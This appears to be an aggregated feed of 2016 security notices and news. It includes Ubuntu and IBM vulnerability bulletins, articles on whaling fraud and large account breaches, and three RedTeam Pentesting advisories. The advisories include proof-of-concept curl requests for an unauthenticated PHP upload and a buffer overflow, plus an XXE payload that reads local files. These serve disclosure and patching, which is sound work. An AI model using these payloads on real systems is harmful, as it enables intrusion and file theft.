tables in XPM images. If a user or automated system were tricked into
processing a specially crafted XPM image, an attacker could cause a denial
of service. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.
(CVE-2014-2497)

It was discovered that the GD library incorrectly handled certain malformed
GIF images. If a user or automated system were tricked into processing a
specially crafted GIF image, an attacker could cause a denial of service.
This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.
(CVE-2014-9709)

It was discovered that the GD library incorrectly handled memory when using
gdImageFillToBorder(). A remote attacker could possibly use this issue to
cause a denial of service. (CVE-2015-8874)

It was discovered that the GD library incorrectly handled memory when using
gdImageScaleTwoPass(). A remote attacker could possibly use this issue to
cause a denial of service. This issue only applied to Ubuntu 14.04 LTS,
Ubuntu 15.10 and Ubuntu 16.04 LTS. (CVE-2015-8877)

Hans Jerry Illikainen discovered that the GD library incorrectly handled
certain malformed GD images. If a user or automated system were tricked
into processing a specially crafted GD image, an attacker could cause a
denial of service or possibly execute arbitrary code. (CVE-2016-3074)

Update instructions

The problem can be corrected by updating your system to the following package version:

Ubuntu 16.04 LTS:

libgd3 2.1.1-4ubuntu0.16.04.1

Ubuntu 15.10:

libgd3 2.1.1-4ubuntu0.15.10.1

Ubuntu 14.04 LTS:

libgd3 2.1.0-3ubuntu0.1

Ubuntu 12.04 LTS:

libgd2-xpm 2.0.36~rc1~dfsg-6ubuntu2.1

libgd2-noxpm 2.0.36~rc1~dfsg-6ubuntu2.1

To update your system, please follow these instructions: http://ift.tt/17VXqjU.

In general, a standard system update will make all the necessary changes.

References

CVE-2014-2497, CVE-2014-9709, CVE-2015-8874, CVE-2015-8877, CVE-2016-3074

from Ubuntu Security Notices http://ift.tt/25xfX1B

USN-2986-1: dosfstools vulnerabilities

Ubuntu Security Notice USN-2986-1

31st May, 2016

dosfstools vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

• Ubuntu 16.04 LTS
• Ubuntu 15.10
• Ubuntu 14.04 LTS
• Ubuntu 12.04 LTS

Summary

dosfstools could be made to crash or run programs if it processed a specially crafted filesystem.

Software description

• dosfstools - utilities for making and checking MS-DOS FAT filesystems

Details

Hanno Böck discovered that dosfstools incorrectly handled certain malformed
filesystems. A local attacker could use this issue to cause dosfstools to
crash, resulting in a denial of service, or possibly execute arbitrary
code.

Update instructions

The problem can be corrected by updating your system to the following package version:

Ubuntu 16.04 LTS:

dosfstools 3.0.28-2ubuntu0.1

Ubuntu 15.10:

dosfstools 3.0.28-1ubuntu0.1

Ubuntu 14.04 LTS:

dosfstools 3.0.26-1ubuntu0.1

Ubuntu 12.04 LTS:

dosfstools 3.0.12-1ubuntu1.3

To update your system, please follow these instructions: http://ift.tt/17VXqjU.

In general, a standard system update will make all the necessary changes.

References

CVE-2015-8872, CVE-2016-4804

from Ubuntu Security Notices http://ift.tt/1sZ3ia3

IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Composite Application Manager for Transactions(Several CVEs)

There are multiple vulnerabilities in IBM® Runtime Environment Java™ Technology Edition, Version 6.0, 7.0 and 8.0 that is used by IBM Tivoli Composite Application Manager for Transactions. These issues were disclosed as part of the IBM Java SDK updates in April 2016.

CVE(s): CVE-2016-3443, CVE-2016-0687, CVE-2016-0686, CVE-2016-3427, CVE-2016-3422, CVE-2016-3426, CVE-2016-0264

Affected product(s) and affected version(s):

IBM Tivoli Composite Application Manager (ITCAM) for Transactions : Versions 7.3.x.x to 7.4.x.x are affected.

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://ift.tt/1Y0TkjQ
X-Force Database: http://ift.tt/1Tg5v61
X-Force Database: http://ift.tt/1N2N2gY
X-Force Database: http://ift.tt/1Tg5wqC
X-Force Database: http://ift.tt/1N2N48r
X-Force Database: http://ift.tt/1Tg5wqE
X-Force Database: http://ift.tt/1N2N2xe
X-Force Database: http://ift.tt/1Tg5wqG

from IBM Product Security Incident Response Team http://ift.tt/1Y0TpUK

IBM Security Bulletin: Vulnerabilities in Kerberos (krb5) affect IBM Security Network Protection (CVE-2015-8629, and CVE-2015-8631)

IBM Security Network Protection uses Kerberos (krb5) to provide network authentication. The Kerberos (krb5) version that is shipped with IBM Security Network Protection contains multiple security vulnerabilities.

CVE(s): CVE-2015-8629, CVE-2015-8631

Affected product(s) and affected version(s):

IBM Security Network Protection 5.3.1
IBM Security Network Protection 5.3.2

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://ift.tt/1UaBu8j
X-Force Database: http://ift.tt/1VjTJgk
X-Force Database: http://ift.tt/1VjTDFF

from IBM Product Security Incident Response Team http://ift.tt/1Y0TsQk

IBM Security Bulletin: A vulnerability in libssh2 affects IBM Security Network Protection (CVE-2016-0787)

The libssh2 packages provide a library that implements the SSHv2 protocol. A security vulnerability has been discovered in libssh2 used with IBM Security Network Protection.

CVE(s): CVE-2016-0787

Affected product(s) and affected version(s):

IBM Security Network Protection 5.3.1
IBM Security Network Protection 5.3.2

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://ift.tt/1Y0TBmM
X-Force Database: http://ift.tt/1WhPh1i

from IBM Product Security Incident Response Team http://ift.tt/1Y0TBmN

IBM Security Bulletin: IBM Security Access Manager for Web is affected by NTP vulnerabilities (CVE-2015-5300, CVE-2015-7704, CVE-2015-8138)

The Network Time Protocol (NTP) is used to synchronize a computer’s time with a

CVE(s): CVE-2015-5300, CVE-2015-7704, CVE-2015-8138

Affected product(s) and affected version(s):

IBM Security Access Manager for Web 7.0 (appliance), all firmware versions

IBM Security Access Manager for Web 8.0, all firmware versions

IBM Security Access Manager 9.0, all firmware versions

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://ift.tt/1UaB8ys
X-Force Database: http://ift.tt/1rd28WE
X-Force Database: http://ift.tt/1W1Vu2C
X-Force Database: http://ift.tt/1rd26hG

from IBM Product Security Incident Response Team http://ift.tt/1Y0TSGi

IBM Security Bulletin: IBM Security Access Manager for Mobile is affected by NTP vulnerabilities (CVE-2015-5300, CVE-2015-7704, CVE-2015-8138)

The Network Time Protocol (NTP) is used to synchronize a computer’s time with a

CVE(s): CVE-2015-5300, CVE-2015-7704, CVE-2015-8138

Affected product(s) and affected version(s):

IBM Security Access Manager for Mobile 8.0, all firmware versions

IBM Security Access Manager 9.0, all firmware versions

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://ift.tt/1Y0TCqS
X-Force Database: http://ift.tt/1rd28WE
X-Force Database: http://ift.tt/1W1Vu2C
X-Force Database: http://ift.tt/1rd26hG

from IBM Product Security Incident Response Team http://ift.tt/1Y0TyHC

IBM Security Bulletin: Several vulnerabilities in the libpng component in IBM Tivoli Common Reporting (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)

Fixes of Cognos Business Intelligence is provided as part of Tivoli Common Reporting (TCR) fixes Several vulnerabilities has been addressed in the libpng component of IBM Cognos Business Intelligence Server.

CVE(s): CVE-2015-8126, CVE-2015-8472, CVE-2015-8540

Affected product(s) and affected version(s):

Tivoli Common Reporting 2.1

Tivoli Common Reporting 2.1.1

Tivoli Common Reporting 2.1.1.2

Tivoli Common Reporting 3.1

Tivoli Common Reporting 3.1.0.1

Tivoli Common Reporting 3.1.0.2

Tivoli Common Reporting 3.1.2

Tivoli Common Reporting 3.1.2.1

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://ift.tt/1XbDbJo
X-Force Database: http://ift.tt/1rUkltb
X-Force Database: http://ift.tt/1ZcEll0
X-Force Database: http://ift.tt/1ZcEnt8

from IBM Product Security Incident Response Team http://ift.tt/1XbCXlz

IBM Security Bulletin: Multiple vulnerabilities impact System Storage DS8000 Hardware Management Console (HMC)

Multiple vulnerabilities in the DS8000 Hardware Management Console are covered in this bulletin. These include: – IBM® Runtime Environment Java™ Technology Edition that is used by the DS8000 Hardware Management Console. These issues were disclosed as part of the IBM Java SDK critical patch updates in October 2015 – GNU C Library (glibc) disclosures – strongSwan disclosure – Network Time Protocol (NTP) disclosures

CVE(s): CVE-2015-4872, CVE-2013-2207, CVE-2015-1781, CVE-2015-7547, CVE-2015-4171, CVE-2015-7691, CVE-2015-7703, CVE-2015-7848, CVE-2015-7850, CVE-2015-7851, CVE-2015-7855

Affected product(s) and affected version(s):

DS8700/DS8800 R6.3 DS8870 R7.x DS8000 R8.X

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://ift.tt/1XbDunD
X-Force Database: http://ift.tt/1WhPj9p
X-Force Database: http://ift.tt/1XbD8x9
X-Force Database: http://ift.tt/1UrnaLo
X-Force Database: http://ift.tt/1rhWqTE
X-Force Database: http://ift.tt/1UrnQ3b
X-Force Database: http://ift.tt/1XbCMXn
X-Force Database: http://ift.tt/1UrnSIt
X-Force Database: http://ift.tt/1XbCU9s
X-Force Database: http://ift.tt/1Urnx8G
X-Force Database: http://ift.tt/1XbCTlO
X-Force Database: http://ift.tt/1Urnny8

from IBM Product Security Incident Response Team http://ift.tt/1XbCBLO

Microsoft Ventures to invest in cloud, security, machine learning startups

CEO Sacked After $56 Million Whaling Attack

An Austrian aerospace manufacturer has sacked its CEO after his apparent mistakes led to the firm being defrauded out of €50 million ($55.8m) in a whaling attack revealed earlier this year.

FACC, which produces parts for the likes of Boeing and Airbus, said that in a supervisory board meeting last week it had decided to “revoke” Walter Stephan with immediate effect.

It added in a brief statement:

“The supervisory board came to the conclusion, that Mr. Walter Stephan has severely violated his duties, in particular in relation to the ‘Fake President Incident’. Mr. Robert Machtlinger was appointed as interim CEO of FACC AG.”

The incident in question appears to have been a classic whaling attack, in which a fraudster impersonating a CEO or senior board member emails a member of the finance department to request a money transfer out of the company.

However, it's unclear exactly what mistakes Stephan played which led to his sacking, as the finance employee who made the mistake in transferring the funds and her immediate boss have already been dismissed, according to reports. 

Such incidents have been on the rise in recent months.

Email security firm Mimecast interviews IT professionals periodically about whaling attacks and found 75% of respondents in March this year had seen an increase in attacks. That’s up from 55% in December 2015.

Also, the FBI warned in February that attacks had generated $2 billion for fraudsters over the past two years.

Orlando Scott-Cowley, cybersecurity strategist at Mimecast, warned firms not to be complacent when they read about whaling attacks.

“Every CEO needs to be ultimately responsible for implementing appropriate checks and balances, including security training and technology, to protect their employees and shareholders from crippling losses,” he told Infosecurity.

“It doesn’t matter how experienced or senior you are – you are still likely to fall for a well-crafted targeted attack. So assume you and your team will be duped, and plan accordingly. The incidents of these attacks are only set to grow. They are relatively easy for the criminals to conduct and are hard to protect against just using traditional security technologies.”

Wieland Alge, EMEA VP at Barracuda Networks said attackers usually spoof the CEO’s email address with a fake domain to improve their chances of success.

“It turns out that the one of the most effective defenses is a very transparent and open company culture. All departments, but particularly HR and Finance, must be able to communicate, preferably over the phone, with the CEO and CFO directly,” he added.

“This is quite a routine practice in young and fast moving companies, but becomes much less common in the larger businesses, sometimes down to the personality of the CEO and CFO, but more often down to well internalized habits. It goes without saying that properly configured and maintained email security systems also play a big part in preventing these kinds of attacks.”

from Infosecurity - Latest New... http://ift.tt/1Vsjrzo

Bugtraq: [RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution

Advisory: Unauthenticated File Upload in Relay Ajax Directory Manager

may Lead to Remote Command Execution

A vulnerability within the Relay Ajax Directory Manager web application

allows unauthenticated attackers to upload arbitrary files to the web

server running the web application.

Details

=======

Product: Relay Ajax Directory Manager

Affected Versions: relayb01-071706, 1.5.1, 1.5.3 were tested, other

versions most likely vulnerable as well.

Fixed Versions: -

Vulnerability Type: Unauthenticated File Upload

Security Risk: high

Vendor URL: http://ift.tt/1Pfk2TM

Vendor Status: decided not to fix, project is unmaintained

Advisory URL: http://ift.tt/1sIvGMP

Advisory Status: published

CVE: GENERIC-MAP-NOMATCH

CVE URL: http://ift.tt/1jQGmEN

Introduction

============

Relay Ajax Directory Manager[1], also known as relay[2], is a web-based

file manager. It allows files and folders to be uploaded via drag and

drop and provides several other features, such as a thumbnail preview

for images and basic user authentication functionality.

More Details

============

While the web application itself is mostly written in PHP, it also

utilizes the Perl script 'upload.pl' for handling uploads initiated by

the user.

Uploading is a multi-step process:

1. The user initiates a multipart/form-data upload request through the

web application. This request is sent to the Perl script and the

following steps are handled by it.

2. A temporary file containing the entire request (including

headers) is created. This temporary file is named partly by the first

URL parameter, as shown in the following listing.

3. The headers and the POST body of the request are parsed and filtered

to determine the final filename.

4. The upload is written to the final destination.

5. A file containing statistics about the upload process is written

During steps 2-5, no checks are performed to ensure that the user is

sufficiently authenticated.

The following listing shows parts of the upload Perl script:

-- upload.pl -----------------------------------------------------------

[...]

@qstring=split(/&/,$ENV{'QUERY_STRING'});

$sessionid = $qstring[0];

[...]

$tmpfile = "$uploadsFolder\\temp_$sessionid";

$statsfile = "$uploadsFolder\\stats_$sessionid.txt";

$tmpfilepre= "$uploadsFolder\\$sessionid\_";

[...]

open(FILE,">","$tmpfilepre$filename") or print "can't open temp file";

binmode(FILE);

print FILE $filedata;

close FILE;

[...]

------------------------------------------------------------------------

Here, the first URL parameter is stored in the variable $sessionid. The

content of this variable is then used as a prefix for the filename for

the uploaded data before it ultimately gets written. Given the

configured upload directory, which is 'uploads/' by default, the URL of

the uploaded file can be determined.

The web application usually requires users to be authenticated before

any actions (e.g. uploading) can be performed, but since the Perl script

is not secured by any form of authentication, it can be accessed by

anyone. If the web server does not prohibit the execution of e.g. PHP

files within the upload directory, arbitrary PHP commands can be

executed by uploading the respective files to the web server.

Proof of Concept

================

In general, the Perl script expects a request containing

multipart/form-data. In this case, the name specified in the 'filename'

field is prepended with the first URL parameter. Using the command line

HTTP client curl, a request like the following can be made to a

vulnerable installation of Relay Ajax Directory Manager in order to

upload a PHP script which invokes the function 'phpinfo()':

curl -i -s -k -X 'POST' -H 'Content-Type: multipart/form-data; boundary=----------------------------83ff53821b7c' --data-binary $'------------------------------83ff53821b7c\x0d\x0a'$'Content-Dispositi

on: form-data; filename=\"info.php\"\x0d\x0a'$'Content-Type: application/octet-stream\x0d\x0a\x0d\x0a'$'<?php phpinfo(); ?>\x0d\x0a'$'------------------------------83ff53821b7c--' 'http://ift.tt/1XLM9M1'

The server responds with HTTP status code 200 indicating a successful

upload:

HTTP/1.1 200 OK

Date: Mon, 09 May 2016 11:09:50 GMT

Server: Apache/2.4.18 (Debian)

Content-Length: 0

Content-Type: text/plain

Such a request would yield the following files in the web server's

upload directory upon success:

$ ls relay-1-5-3/uploads/

redteam_info.php stats_redteam.txt temp_redteam

The file redteam_info.php contains the multipart/form-data that was

sent to the upload.pl script:

$ cat relay-1-5-3/uploads/temp_redteam.php

<?php phpinfo(); ?>

Requesting this file with the URL

http://ift.tt/1sIvGwd will then yield

the server's output of the phpinfo() function.

However, since the entire content of the upload request is saved to a

temporary file, a regular POST request containing only the code to be

executed is sufficient to exploit this vulnerability. The following

invocation of curl uploads the same PHP script which invokes the

function 'phpinfo()':

$ curl --silent --include --data '<?php phpinfo(); ?>' 'http://ift.tt/1TTSAtJ'

In the server's upload directory, the file temp_redteam.php contains

the data that was sent to the upload.pl script:

$ ls relay-1-5-3/uploads/

stats_redteam.php.txt temp_redteam.php

$ cat temp_redteam.php

<?php phpinfo(); ?>

Requesting this file with the URL

http://ift.tt/1sIvXz6 will again yield

the server's output of the phpinfo() function.

Using either of these methods, an attacker is able to upload arbitrary

files to the affected web server e.g. in order to easily execute PHP

commands with the privileges of the web server.

Workaround

==========

One possible workaround would be to prevent the execution of files in

the upload directory and deliver them as attachments instead.

Fix

===

None.

Security Risk

=============

This vulnerability allows unauthenticated attackers to upload arbitrary

files to the affected system. In the web server's and project's default

configuration it is very likely that this may be used to execute

arbitrary commands with the privileges of the web server process. This

is possible without authentication, thereby providing no barrier for

attackers. It is therefore rated as a high risk. Since this software is

quite old and not well maintained, it is likely that additional

vulnerabilities exist. However, this was not further evaluated.

Timeline

========

2015-11-19 Vulnerability discovered

2016-04-07 Customer approved disclosure of vulnerability

2016-05-12 Developers contacted, project is no longer maintained

2016-05-31 Advisory published

References

==========

[1] http://ift.tt/1Pfk2TM

[2] http://ift.tt/1pE6Ji8

RedTeam Pentesting GmbH

=======================

RedTeam Pentesting offers individual penetration tests performed by a

team of specialised IT-security experts. Hereby, security weaknesses in

company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to

share its knowledge and enhance the public knowledge with research in

security-related areas. The results are made available as public

security advisories.

More information about RedTeam Pentesting can be found at:

http://ift.tt/1ixScMF

--

RedTeam Pentesting GmbH Tel.: +49 241 510081-0

Dennewartstr. 25-27 Fax : +49 241 510081-99

52068 Aachen http://ift.tt/1ixScMF

Germany Registergericht: Aachen HRB 14004

Geschäftsführer: Patrick Hof, Jens Liebchen

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v2

iQEcBAABCgAGBQJXTXsaAAoJENG/HXWsgFSuDzQIAL7ObaccoLbd5IrHqXnC52BY

ksNZ0opOAQbd42IZQ8o8y9Y762hSDIZtrDmkNVo1UzFC68Fv7fBlG8ERYXuzQRnF

FIlSM5KNmBt/eFV/hc/6qdpzRnLTTq5/x0owqpArNv33i702LeNGOH56a4F3bTt3

T0aaaPbbZ5mXMsZQ3IDNpDjLqutc6Ziz7BvVfyQttT9U6RvSSs54G4deQaGvdn4Y

7qHu3H93nnx0R8naAx5qDqmJwNWEbLKoKDg2kuk9sLlMD/AoXojzD6tavthGmHnL

fatIbeeu9VtXPwpXjGzoSEW9BgjoYqRTRZg9jg4A+xgqbqx34CE+iobgdztZnfQ=

=z9dg

-----END PGP SIGNATURE-----

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/1UagkHs

Bugtraq: [RT-SA-2016-004] Websockify: Remote Code Execution via Buffer Overflow

Advisory: Websockify: Remote Code Execution via Buffer Overflow

RedTeam Pentesting discovered a buffer overflow vulnerability in the C

implementation of Websockify, which allows attackers to execute

arbitrary code.

Details

=======

Product: Websockify C implementation

Affected Versions: all versions <= 0.8.0

Fixed Versions: versions since commit 192ec6f (2016-04-22) [0]

Vulnerability Type: Buffer Overflow

Security Risk: high

Vendor URL: http://ift.tt/19GQpRR

Vendor Status: fixed

Advisory URL: http://ift.tt/1sIvIEp

Advisory Status: published

CVE: GENERIC-MAP-NOMATCH

CVE URL: http://ift.tt/1jQGmEN

Introduction

============

"websockify was formerly named wsproxy and was part of the noVNC

project.

At the most basic level, websockify just translates WebSockets traffic

to normal TCP socket traffic. Websockify accepts the WebSockets

handshake, parses it, and then begins forwarding traffic between the

client and the target in both directions."

(from the project's readme)

More Details

============

For each new connection, websockify forks and calls the function

do_handshake() to receive a client's WebSocket handshake. The

following excerpt shows some of the source code responsible for

receiving the client's data from the socket file descriptor:

------------------------------------------------------------------------

ws_ctx_t *do_handshake(int sock) {

char handshake[4096], response[4096], sha1[29], trailer[17];

[...]

offset = 0;

for (i = 0; i < 10; i++) {

len = ws_recv(ws_ctx, handshake+offset, 4096);

if (len == 0) {

handler_emsg("Client closed during handshake\n");

return NULL;

}

offset += len;

handshake[offset] = 0;

if (strstr(handshake, "\r\n\r\n")) {

break;

}

usleep(10);

}

[...]

------------------------------------------------------------------------

As can be seen in the listing, the function ws_recv() is called in a

loop to read data from the client's socket into the stack-allocated

buffer 'handshake'. Each time ws_recv() is called, a maximum of 4096

bytes are read from the socket and stored in the handshake buffer.

The variable 'offset' determines the position in the buffer at which

the received data is written. In each iteration, the value of 'offset'

is increased by the amount of bytes received. If the received data

contains the string "\r\n\r\n", which marks the end of the WebSocket

handshake data, the loop is terminated. Otherwise, the loop is

terminated after a maximum of 10 iterations. The do_handshake()

function returns early if no more data can be received from the

socket.

By forcing websockify to iterate multiple times, attackers can

exploit this behaviour to write data past the space allocated for the

handshake buffer, thereby corrupting adjacent memory.

Proof of Concept

================

The following curl command can be used to trigger the buffer overflow:

$ curl http://example.com/$(python -c 'print "A"*5000')

Providing a generic exploit for this vulnerability is not feasible, as

it depends on the server side environment websockify is used in as well

as the used compiler and its flags. However, during a penetration test

it was possible to successfully exploit this buffer overflow

vulnerability and to execute arbitrary commands on the server.

Workaround

==========

Use the Python implementation of websockify.

Fix

===

The vulnerability has been fixed in commit 192ec6f [0].

Security Risk

=============

Successful exploitation of the vulnerability allows attackers to execute

arbitrary code on the affected system. It is therefore rated as a high

risk.

Timeline

========

2016-04-14 Vulnerability identified

2016-05-03 Advisory provided to customer

2016-05-06 Customer provided updated firmware, notified users

2016-05-23 Customer notified users again

2016-05-31 Advisory published

References

==========

[0] http://ift.tt/1XLMMVC

ad4bd9e7bcd9

RedTeam Pentesting GmbH

=======================

RedTeam Pentesting offers individual penetration tests performed by a

team of specialised IT-security experts. Hereby, security weaknesses in

company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to

share its knowledge and enhance the public knowledge with research in

security-related areas. The results are made available as public

security advisories.

More information about RedTeam Pentesting can be found at:

http://ift.tt/1ixScMF

--

RedTeam Pentesting GmbH Tel.: +49 241 510081-0

Dennewartstr. 25-27 Fax : +49 241 510081-99

52068 Aachen http://ift.tt/1ixScMF

Germany Registergericht: Aachen HRB 14004

Geschäftsführer: Patrick Hof, Jens Liebchen

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v2

iQEcBAABCgAGBQJXTXqbAAoJENG/HXWsgFSuRycIALYDa+gduzuDFurhuk2zY4Nm

5ZXujPsC+P+E7dSBYIy95fXYOcQai4INGQg+MVNcGGfQ9E7Q7xp5w2g+H2NngwOM

YTbZnSmjXh57SppDkpbhDVPN2UPviIVAVok5lIWbu8zsBXhAzFqQvZYCLKxkSUKu

lkiq3ODMjYI8ZoHs34W5ceh9aGV3g1t2+QseE9hR2euPjCoPWWDedp+lNRtI6PMK

4FzXmwxGN2hmPQdhDWR/jgZNi/fdzD1qdooFNJxKK+b3/5Ika8/bcNBCi8r2AwBQ

Q1o5lK1TS/UUpRYlMyF9RB1/OHayD5U3UKjC1dNawMcLVDbV7d/F+5RTHmcoLJg=

=76mY

-----END PGP SIGNATURE-----

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/25y8rHa

Bugtraq: [RT-SA-2015-012] XML External Entity Expansion in Paessler PRTG Network Monitor

Advisory: XML External Entity Expansion in Paessler PRTG Network Monitor

Authenticated users who can create new HTTP XML/REST Value sensors in

PRTG Network Monitor can read local files on the PRTG host system via

XML external entity expansion.

Details

=======

Product: Paessler PRTG Network Monitor

Affected Versions: 14.4.12.3282

Fixed Versions: 16.2.23.3077/3078

Vulnerability Type: XML External Entity Expansion

Security Risk: medium

Vendor URL: http://ift.tt/1TlTFgp

Vendor Status: fixed version released

Advisory URL: http://ift.tt/1sIvFZb

Advisory Status: published

CVE: CVE-2015-7743

CVE URL: http://ift.tt/1PfjYUj

Introduction

============

"PRTG Network Monitor is the powerful and comprehensive network

monitoring solution from Paessler AG. It monitors your network using a

whole range of technologies and assures the availability of network

components and measures traffic and usage. PRTG saves costs by avoiding

outages, optimizing connections, saving time and controlling service

level agreements (SLAs)."

(from the vendor's website)[1]

More Details

============

An attacker with access to a PRTG Network Monitor account with

sufficient privileges to create or configure XML/REST sensors can read

files stored on the system's local disk. These sensors are intended to

query a URL and, depending on the configuration, check whether there is

a valid response or read the value of a specific XML node in the

document that is returned. This functionality is vulnerable to XML

external entity expansion.

Proof of Concept

================

In order to exploit this vulnerability an HTTP XML/REST Value sensor has

to be set up to access an attacker-controlled URL and to read the value

of a specific XML node, for example:

http://ift.tt/1sIvX24

The XML document "xeee-hosts.xml" contains an external entity that uses

the "SYSTEM" keyword to load a local file as the content of the "hosts"

entity:

<?xml version="1.0"?>

<!DOCTYPE root [

<!ENTITY hosts SYSTEM "http://fileC:\Windows\System32\drivers\etc\hosts">

]>

<root>&hosts;</root>

Since the XML parser of PRTG Network Monitor evaluates external

entities, the XML parser fetches the file

"C:\Windows\System32\drivers\etc\hosts"

from the disk of the local system and inserts its content into the

"root" node of the XML document. If the sensor is configured to return

the value of that "root" node, the contents of that file are displayed

in the web interface of PRTG Network Monitor. This discloses the

contents of the file to attackers which otherwise would not be able to

read local files.

Fix

===

Update to a version greater or equal to 16.2.23.3077/3078 (see [2]).

Security Risk

=============

Attackers who can create new HTTP XML/REST sensors in PRTG Network

Monitor, are able to use the XML external entity expansion to read files

on the local system. Depending on the data stored on the vulnerable

system, this vulnerability may pose a high risk. However, as attackers

are required to already have valid user credentials for the application,

the vulnerability is only rated to have a medium risk potential.

Timeline

========

2015-08-28 Vulnerability identified in PRTG Network Monitor

2015-09-04 Customer approved disclosure of vulnerability

2015-09-04 CVE ID requested

2015-09-24 CVE ID requested again

2015-10-07 CVE ID assigned

2015-10-21 Vendor contacted

2016-04-04 Vendor released fixed version

2016-05-31 Advisory released

References

==========

[1] http://ift.tt/1TlTFgp

[2] http://ift.tt/1PfjZaP

RedTeam Pentesting GmbH

=======================

RedTeam Pentesting offers individual penetration tests performed by a

team of specialised IT-security experts. Hereby, security weaknesses in

company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to

share its knowledge and enhance the public knowledge with research in

security-related areas. The results are made available as public

security advisories.

More information about RedTeam Pentesting can be found at

http://ift.tt/1ixScMF.

--

RedTeam Pentesting GmbH Tel.: +49 241 510081-0

Dennewartstr. 25-27 Fax : +49 241 510081-99

52068 Aachen http://ift.tt/1ixScMF

Germany Registergericht: Aachen HRB 14004

Geschäftsführer: Patrick Hof, Jens Liebchen

-----BEGIN PGP SIGNATURE-----

Version: GnuPG v2

iQEcBAABCgAGBQJXTXljAAoJENG/HXWsgFSuGxEIAIG04T2JmRAoo2VsgHVxsDuR

Z0jdFeeaQeMkAMRXLZzVg9PU78fvlfk/9BAzSNlZEdIQtrXsfcrftfSiRsA7Dzu+

f5ON9zU8Hlxf4sq1Fl7vuwbsEqheJ9odS/QxI/7ljPM7pmzDw5O72ZaK3VK3j6QW

u9OZh3ZhoZntm8D+m3rmZcaSf/W97AmgPw0YAcTQwRZPxHgT/1moi3tczKIaB9x3

k614XnzWMsp2S+osLOQ4Ygsku8iYgm97YhwP31Yp/sgHFlvwtkr8oS4YaQo30I7Q

5ZfoXO4+pLymPcMpWW1IwPEe4Z7jjJVbMqZK3hL8j6k2mbUMsbPR33vq7L1PGsA=

=GB+f

-----END PGP SIGNATURE-----

[ reply ]

from SecurityFocus Vulnerabilities http://ift.tt/1UagjmU

Device hijacking security flaws discovered in LG handsets

Data from 360 Million MySpace Accounts Stolen

Data pinched from around 360 million MySpace accounts is up for sale online, according to recent reports.

Lorenzo Fraceschi-Bicchierai at Vice Motherboard said the information can be purchased on criminal forums and is being sold by “Peace”, the same hacker who sold credentials for 165 million LinkedIn accounts this month.

Leakedsource.com, a service that allows users to check their credentials against stolen data sets, wrote in a blog that the information “may contain an email address, a username, one password and in some cases a second password.”

Further, Leakedsource.com stated that of the 360 million records stolen 111,341,258 accounts had a username attached to it and 68,493,651 had a secondary password (some did not have a primary password).

What’s more, the firm pointed out that “The methods MySpace used for storing passwords are not what internet standards propose and is very weak encryption or some would say it's not encryption at all but it gets worse. We noticed that very few passwords were over 10 characters in length (in the thousands) and nearly none contained an upper case character which makes it much easier for people to decrypt.”

Although it is currently unknown when the information was stolen, the list of most commonly used passwords among the data would suggest the details are old, with culturally-based passwords linked to phenomenons most popular during the late 1990s and early 2000s.

MySpace was launched in 2003 before being purchased by News Corporation in 2005. The site went on to become the most dominant social-networking website in the world between 2005 and 2008, surpassing Google as the most visited website in the US in 2006. It was not until 2008 that Facebook overtook MySpace in terms of unique worldwide visitors, and since then its number of users has steadily declined. 

Despite this the site, which recently claimed to have surpassed the threshold of one billion users, and still has an estimated 50 million unique visitors per month as of 2015. With this is mind, and taking into account the fact that many accounts – even if they are dormant – might still contain sensitive data can be leveraged in an attack, this data theft could pose a significant risk for MySpace users old and current. Additionally, it also shows that the site was hacked at some point, and MySpace either did not know about it or simply did not disclose it publically or to its customers.

Users who still have an active MySpace account are advised to change their password and, more importantly, change the password of other more sensitive services if they use the same password as the MySpace account.

from Infosecurity - Latest New... http://ift.tt/1Vs6yFG

Tumblr Breach Hit 65 Million as Pattern Emerges

A security expert has warned that there could be a lot more to come, following recent revelations of data breaches that happened several years ago at web firms including LinkedIn, MySpace and Tumblr.

Earlier this month, 167 million records were found to have been exposed after a breach at LinkedIn in 2012 – despite the firm claiming at the time that just 6.5 million users were affected.

Then last week it was revealed that around 360 million records had been stolen from social media site MySpace.

Most recently a Tumblr hack from 2013 which the firm only discovered and notified users about earlier this month, has been found to have exposed 65 million records.

This is despite the Yahoo-owned firm playing down the incident by claiming that only a “set of Tumblr user email addresses with salted and hashed passwords” was stolen.

Troy Hunt runs the Have I been pwned (HIBP) website which allows users to check whether their information has been stolen from any sites they have online accounts with.

He claimed in a new post that in the past week alone he’s loaded 269 million records into the system – almost as many as were in the entire site prior to that.

Data from all three web firms, along with a fourth – Fling – are for sale on the darknet, from the same vendor, going by the handle peace_of_mind.

These breaches are all of extremely large volumes of data and all happened at least three years ago but have been sitting dormant, leading Hunt to speculate there may be a connection.

“There's been some catalyst that has brought these breaches to light and to see them all fit this mould and appear in such a short period of time, I can't help but wonder if they're perhaps related,” he suggested.

“If this indeed is a trend, where does it end? What more is in store that we haven't already seen? And for that matter, even if these events don't all correlate to the same source and we're merely looking at coincidental timing of releases, how many more are there in the ‘mega’ category that are simply sitting there in the clutches of various unknown parties?”

from Infosecurity - Latest New... http://ift.tt/25whCUW

Israeli researchers poke holes in Samsung KNOX security system

Bugtraq: [slackware-security] mozilla-thunderbird (SSA:2016-152-02)

-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1

[slackware-security] mozilla-thunderbird (SSA:2016-152-02)

